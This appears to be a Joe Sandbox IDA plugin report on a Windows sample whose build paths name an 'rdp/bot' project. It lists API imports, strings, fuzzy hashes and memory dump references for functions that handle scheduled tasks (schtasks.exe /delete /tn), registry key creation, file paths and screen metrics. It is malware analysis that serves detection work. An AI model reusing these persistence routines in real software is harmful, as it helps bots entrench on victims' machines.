Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: $(attr != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
API String ID: 1799206407-2463373822
Opcode ID: 4d9df2951772254c967499a4228b22843900a401b1c47d39b5e3e2a1b9d8fad4
Instruction ID: 420601cd02996d5ede770041eb000d546b6eedac7b0e130608d50b68eeb5286c
Opcode Fuzzy Hash: 4d9df2951772254c967499a4228b22843900a401b1c47d39b5e3e2a1b9d8fad4
Instruction Fuzzy Hash: CB51A1A190CE07DAFBA15B87A4407BE27197F407B8F1415BAC91E0A5F2FF6CA945C301

Function 00007FFE11507042 Relevance: 25.7, APIs: 7, Strings: 10, Instructions: 241memorystringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFE1150708D
HeapFree.KERNEL32 ref: 00007FFE1150709E

Part of subcall function 00007FFE11504835: fopen.MSVCRT ref: 00007FFE1150487A
Part of subcall function 00007FFE11504835: fseek.MSVCRT ref: 00007FFE11504899
Part of subcall function 00007FFE11504835: _errno.MSVCRT ref: 00007FFE115048AD
Part of subcall function 00007FFE11504835: _errno.MSVCRT ref: 00007FFE115048C8

GetProcessHeap.KERNEL32 ref: 00007FFE115071CA
HeapAlloc.KERNEL32 ref: 00007FFE115071DB
strncpy.MSVCRT ref: 00007FFE1150731C
strncpy.MSVCRT ref: 00007FFE11507333
strncpy.MSVCRT ref: 00007FFE11507392

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

[I] (%s) -> Done(path=%s), xrefs: 00007FFE115073F8
mem_alloc, xrefs: 00007FFE11507223
(path != NULL), xrefs: 00007FFE11507104
NULL, xrefs: 00007FFE115073E2
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE115070D6
ini_load, xrefs: 00007FFE115070CF, 00007FFE1150710B, 00007FFE115073F1
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11507112
5, xrefs: 00007FFE115070F5
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE115070FD
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE1150722A

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
String ID: (path != NULL)$5$H:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc
API String ID: 1423203057-3539035513
Opcode ID: f795b7b6bc23c65bdb57aee670771b5625fbdcaca3f78c2ea69e8484e5c5f790
Instruction ID: b42ab947df0c89f15a82538a9c80cfaa0052c0ade9a2aaea9f1dac079e9df224
Opcode Fuzzy Hash: f795b7b6bc23c65bdb57aee670771b5625fbdcaca3f78c2ea69e8484e5c5f790
Instruction Fuzzy Hash: C9A1C362A0DE8291FB11CB97E8407BD676AAF40BA4F4440BAEECD477B5DE6CE545C300

Function 00007FFE1150A9E0 Relevance: 24.1, APIs: 11, Strings: 5, Instructions: 96stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE1150AA0D
strlen.MSVCRT ref: 00007FFE1150AA69
strncpy.MSVCRT ref: 00007FFE1150AA7D
strlen.MSVCRT ref: 00007FFE1150AA85
strlen.MSVCRT ref: 00007FFE1150AAC0
strlen.MSVCRT ref: 00007FFE1150AAE2
strcat.MSVCRT ref: 00007FFE1150AAFB
strlen.MSVCRT ref: 00007FFE1150AB1A
strncpy.MSVCRT ref: 00007FFE1150AB29
strlen.MSVCRT ref: 00007FFE1150AB31
strlen.MSVCRT ref: 00007FFE1150AB41

Strings

schtasks_check, xrefs: 00007FFE1150AA49
(config_path != NULL), xrefs: 00007FFE1150AA42
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1150AA50
%SystemRoot%\System32\Tasks\, xrefs: 00007FFE1150AAA5
H:/Projects/rdp/bot/program-manager/schtasks.c, xrefs: 00007FFE1150AA3B

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: strlen$strncpy$strcat
String ID: %SystemRoot%\System32\Tasks\$(config_path != NULL)$H:/Projects/rdp/bot/program-manager/schtasks.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$schtasks_check
API String ID: 3175219844-2396484959
Opcode ID: 98c9c9e3af5c1df847b95099f8c9bb74a7acef11151f3cd9e5867709a3f84f58
Instruction ID: 31ad7ced48d61d1abc5ac449868ac6632b8e6cc8d88624a0a96c1095fab1e54a
Opcode Fuzzy Hash: 98c9c9e3af5c1df847b95099f8c9bb74a7acef11151f3cd9e5867709a3f84f58
Instruction Fuzzy Hash: 7A41E421B0CE8342FB119B67A8553FD67569B817A4F8841B5D94E0B6B6CF2CD64A8700

Function 00007FF76A909048 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 191COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00007FF76A909079
GetSystemMetrics.USER32 ref: 00007FF76A90908E
GetLastError.KERNEL32 ref: 00007FF76A90909F

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

GetLastError.KERNEL32 ref: 00007FF76A90919C

Strings

(ratio != NULL), xrefs: 00007FF76A909150
c, xrefs: 00007FF76A909141
[E] (%s) -> GetSystemMetrics(SM_CYSCREEN) failed(gle=%lu), xrefs: 00007FF76A9091AF
[E] (%s) -> GetSystemMetrics(SM_CXSCREEN) failed(gle=%lu), xrefs: 00007FF76A9090B2
(height != NULL), xrefs: 00007FF76A9090F0
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A9090FE, 00007FF76A90912E, 00007FF76A90915E
sys_screen_info, xrefs: 00007FF76A9090AB, 00007FF76A9090F7, 00007FF76A909127, 00007FF76A909157, 00007FF76A9091A8
(width != NULL), xrefs: 00007FF76A909120
H:/Projects/rdp/bot/codebase/sys.c, xrefs: 00007FF76A9090E9, 00007FF76A909119, 00007FF76A909149

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: ErrorLastMetricsSystem$fflushfwrite
String ID: (height != NULL)$(ratio != NULL)$(width != NULL)$H:/Projects/rdp/bot/codebase/sys.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GetSystemMetrics(SM_CXSCREEN) failed(gle=%lu)$[E] (%s) -> GetSystemMetrics(SM_CYSCREEN) failed(gle=%lu)$c$sys_screen_info
API String ID: 144387239-4168848430
Opcode ID: 8ecad8ed2b97adc45959c9ac36f98e65daea784dbca03547dcc4ae02b3152b83
Instruction ID: 37fed74fd681f5351be296c11564d85db6934cd52bcaebe8e619334bcd50fa68
Opcode Fuzzy Hash: 8ecad8ed2b97adc45959c9ac36f98e65daea784dbca03547dcc4ae02b3152b83
Instruction Fuzzy Hash: 5D714E50F0C747D5FBA1B728A84437AE1956F14B88FF000BAD50ECA3D4DD6CAD859721

Function 00007FFE11503078 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 191COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00007FFE115030A9
GetSystemMetrics.USER32 ref: 00007FFE115030BE
GetLastError.KERNEL32 ref: 00007FFE115030CF

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

GetLastError.KERNEL32 ref: 00007FFE115031CC

Strings

[E] (%s) -> GetSystemMetrics(SM_CXSCREEN) failed(gle=%lu), xrefs: 00007FFE115030E2
(height != NULL), xrefs: 00007FFE11503120
sys_screen_info, xrefs: 00007FFE115030DB, 00007FFE11503127, 00007FFE11503157, 00007FFE11503187, 00007FFE115031D8
[E] (%s) -> GetSystemMetrics(SM_CYSCREEN) failed(gle=%lu), xrefs: 00007FFE115031DF
(width != NULL), xrefs: 00007FFE11503150
c, xrefs: 00007FFE11503171
(ratio != NULL), xrefs: 00007FFE11503180
H:/Projects/rdp/bot/codebase/sys.c, xrefs: 00007FFE11503119, 00007FFE11503149, 00007FFE11503179
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1150312E, 00007FFE1150315E, 00007FFE1150318E

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastMetricsSystem$fflushfwrite
String ID: (height != NULL)$(ratio != NULL)$(width != NULL)$H:/Projects/rdp/bot/codebase/sys.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GetSystemMetrics(SM_CXSCREEN) failed(gle=%lu)$[E] (%s) -> GetSystemMetrics(SM_CYSCREEN) failed(gle=%lu)$c$sys_screen_info
API String ID: 144387239-4168848430
Opcode ID: 85ecae58c040243c2ba47c642318a8e3d3def25d3ae6490dd87e8abd42941757
Instruction ID: 98b933ffd8a5bdc630b0a4e56e52d54318e46222a4675d3506d20fcdabdf499b
Opcode Fuzzy Hash: 85ecae58c040243c2ba47c642318a8e3d3def25d3ae6490dd87e8abd42941757
Instruction Fuzzy Hash: 98714150B0CD4399F7A1979798443BE276E6F08379F4044BBD50F8A2F2EE6DA985C302

Function 00007FFE115069A8 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 154COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32 ref: 00007FFE115069DC

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

GetLastError.KERNEL32 ref: 00007FFE11506B3B

Strings

[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu), xrefs: 00007FFE11506A17
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11506A4A, 00007FFE11506A7D, 00007FFE11506AAD, 00007FFE11506ADD
((*xpath_sz) > 0), xrefs: 00007FFE11506ACF
fs_path_expand, xrefs: 00007FFE11506A10, 00007FFE11506A43, 00007FFE11506A76, 00007FFE11506AA6, 00007FFE11506AD6, 00007FFE11506B08, 00007FFE11506B49, 00007FFE11506C24
[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x), xrefs: 00007FFE11506B0F
[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu), xrefs: 00007FFE11506C2B
(xpath_sz != NULL), xrefs: 00007FFE11506A9F
(path != NULL), xrefs: 00007FFE11506A3C
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE11506A35, 00007FFE11506A68, 00007FFE11506A98, 00007FFE11506AC8
[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu), xrefs: 00007FFE11506B50
(xpath != NULL), xrefs: 00007FFE11506A6F

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: EnvironmentErrorExpandLastStringsfflushfwrite
String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
API String ID: 1721699506-2273971785
Opcode ID: b81daba305cda5c1c45a0fc67c1a085ab3fe8e839dc70f9059648c7f8e50baf3
Instruction ID: cd8de055f13fc0a746967c56b94e55261241b40588ab67f310337ed29610265c
Opcode Fuzzy Hash: b81daba305cda5c1c45a0fc67c1a085ab3fe8e839dc70f9059648c7f8e50baf3
Instruction Fuzzy Hash: 4F615EA1A0CD47D5FB219B97E8403BD265AAF40378FA941BAC50E471B4DF7CEA86C311

Function 00007FF76A9013B9 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 103COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 00007FF76A9013E6
LoadResource.KERNEL32 ref: 00007FF76A9013FE

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

GetLastError.KERNEL32 ref: 00007FF76A9014F8
GetLastError.KERNEL32 ref: 00007FF76A90152D
GetLastError.KERNEL32 ref: 00007FF76A901532

Strings

[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat, xrefs: 00007FF76A901486
module_get_version, xrefs: 00007FF76A90147F, 00007FF76A9014B8, 00007FF76A9014E3, 00007FF76A901506, 00007FF76A90153B
H:/Projects/rdp/bot/codebase/module.c, xrefs: 00007FF76A9014AA, 00007FF76A9014D5
[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu), xrefs: 00007FF76A901542
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A9014BF, 00007FF76A9014EA
[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu), xrefs: 00007FF76A90150D
(out != NULL), xrefs: 00007FF76A9014DC
(hnd != NULL), xrefs: 00007FF76A9014B1

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: ErrorLast$Resource$FindLoadfflushfwrite
String ID: (hnd != NULL)$(out != NULL)$H:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
API String ID: 2123903355-1944070753
Opcode ID: 307a2efdd69fb554138e3bebd3f7e8ff1701443d9c916b0dbfeb3d73ba67c19f
Instruction ID: c3596d21a129301ca59cad6a5b6a24ceb3be6c4ddc6bd015972e8e6fe0b2a5ac
Opcode Fuzzy Hash: 307a2efdd69fb554138e3bebd3f7e8ff1701443d9c916b0dbfeb3d73ba67c19f
Instruction Fuzzy Hash: 50410C75A09342CAF751EF29E440569B7A0FB48798FA00275EA6DC3694EF3CE944CB20

Function 00007FFE11509D19 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 103COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 00007FFE11509D46
LoadResource.KERNEL32 ref: 00007FFE11509D5E

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

GetLastError.KERNEL32 ref: 00007FFE11509E58
GetLastError.KERNEL32 ref: 00007FFE11509E8D
GetLastError.KERNEL32 ref: 00007FFE11509E92

Strings

H:/Projects/rdp/bot/codebase/module.c, xrefs: 00007FFE11509E0A, 00007FFE11509E35
[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu), xrefs: 00007FFE11509EA2
[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat, xrefs: 00007FFE11509DE6
(out != NULL), xrefs: 00007FFE11509E3C
(hnd != NULL), xrefs: 00007FFE11509E11
module_get_version, xrefs: 00007FFE11509DDF, 00007FFE11509E18, 00007FFE11509E43, 00007FFE11509E66, 00007FFE11509E9B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11509E1F, 00007FFE11509E4A
[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu), xrefs: 00007FFE11509E6D

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLast$Resource$FindLoadfflushfwrite
String ID: (hnd != NULL)$(out != NULL)$H:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
API String ID: 2123903355-1944070753
Opcode ID: a4e7fcd03440f43c5bac0c338a2e816e84c2f263d9a2879c62edf520cd84a144
Instruction ID: a0d2cc4d999b2a983c7fd3bc3b3e1f3abd71d4accc9a5ae3c1e4a24d729a5af2
Opcode Fuzzy Hash: a4e7fcd03440f43c5bac0c338a2e816e84c2f263d9a2879c62edf520cd84a144
Instruction Fuzzy Hash: 6C414072A09A428BE751CF6AE48056977E5FB48764F400175EA5D837B8EF3CE844CB00

Function 00007FFE1150AFB7 Relevance: 22.6, APIs: 4, Strings: 11, Instructions: 103stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE1150AFE8
strlen.MSVCRT ref: 00007FFE1150B05E
strncpy.MSVCRT ref: 00007FFE1150B075
strlen.MSVCRT ref: 00007FFE1150B07D

Strings

/delete, xrefs: 00007FFE1150B0E3
NULL, xrefs: 00007FFE1150B193
[I] (%s) -> Done(config_path=%s), xrefs: 00007FFE1150B185
h, xrefs: 00007FFE1150B0A2
(config_path != NULL), xrefs: 00007FFE1150B002
schtasks_delete, xrefs: 00007FFE1150B009, 00007FFE1150B12D, 00007FFE1150B17E
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1150B010
schtasks.exe, xrefs: 00007FFE1150B0EF
[E] (%s) -> Failed(config_path=%s,err=%08x), xrefs: 00007FFE1150B134
H:/Projects/rdp/bot/program-manager/schtasks.c, xrefs: 00007FFE1150AFFB
/tn, xrefs: 00007FFE1150B0CB

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: strlen$strncpy
String ID: (config_path != NULL)$/delete$/tn$H:/Projects/rdp/bot/program-manager/schtasks.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(config_path=%s,err=%08x)$[I] (%s) -> Done(config_path=%s)$h$schtasks.exe$schtasks_delete
API String ID: 683370648-2373739955
Opcode ID: 9cb641b43bf02df5efe46f43a787c30d1636080bcbf85cac401b10790b721592
Instruction ID: 173b6d83569a87b8bb4f1d776b8842cdf80eb6bab1206a25daab6ff0137a75a0
Opcode Fuzzy Hash: 9cb641b43bf02df5efe46f43a787c30d1636080bcbf85cac401b10790b721592
Instruction Fuzzy Hash: 0641E022A08E8395FB119B9AE4903FD635AAB44364F8401B5DA4D07BB5EF7DD60AC700

Function 00007FF76A9053F4 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 116registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32 ref: 00007FF76A90544C
RegCloseKey.ADVAPI32 ref: 00007FF76A905471

Strings

(key != NULL), xrefs: 00007FF76A9054D8
NULL, xrefs: 00007FF76A9055F6
[I] (%s) -> Done(root=0x%p,key=%s), xrefs: 00007FF76A905488
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A9054B6, 00007FF76A9054E6
registry_create_key, xrefs: 00007FF76A905481, 00007FF76A9054AF, 00007FF76A9054DF, 00007FF76A905511, 00007FF76A905542
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FF76A9054A1, 00007FF76A9054D1
[E] (%s) -> RegCreateKeyExA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FF76A905549
[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x), xrefs: 00007FF76A905518
(root != NULL), xrefs: 00007FF76A9054A8
?, xrefs: 00007FF76A905430

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: CloseCreate
String ID: (key != NULL)$(root != NULL)$?$H:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegCreateKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_create_key
API String ID: 2932200918-412249795
Opcode ID: d4ad317a5d25cb66575cc11d0ac7b0f0c4753baf6b14eb3bf7d34ecfe1b293f9
Instruction ID: 1db51c1219fa07eee9769731cbfadafc87abdf231cfad3457340a513a32758b3
Opcode Fuzzy Hash: d4ad317a5d25cb66575cc11d0ac7b0f0c4753baf6b14eb3bf7d34ecfe1b293f9
Instruction Fuzzy Hash: 42518866E0C753C6FA21BB48A4407B8E251AB003D4FF441BAD99DC76A4DE2DED84C760

Function 00007FFE115084F4 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 116registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32 ref: 00007FFE1150854C
RegCloseKey.ADVAPI32 ref: 00007FFE11508571

Strings

NULL, xrefs: 00007FFE115086F6
?, xrefs: 00007FFE11508530
registry_create_key, xrefs: 00007FFE11508581, 00007FFE115085AF, 00007FFE115085DF, 00007FFE11508611, 00007FFE11508642
[I] (%s) -> Done(root=0x%p,key=%s), xrefs: 00007FFE11508588
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE115085B6, 00007FFE115085E6
(key != NULL), xrefs: 00007FFE115085D8
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE115085A1, 00007FFE115085D1
[E] (%s) -> RegCreateKeyExA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE11508649
[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x), xrefs: 00007FFE11508618
(root != NULL), xrefs: 00007FFE115085A8

Memory Dump Source

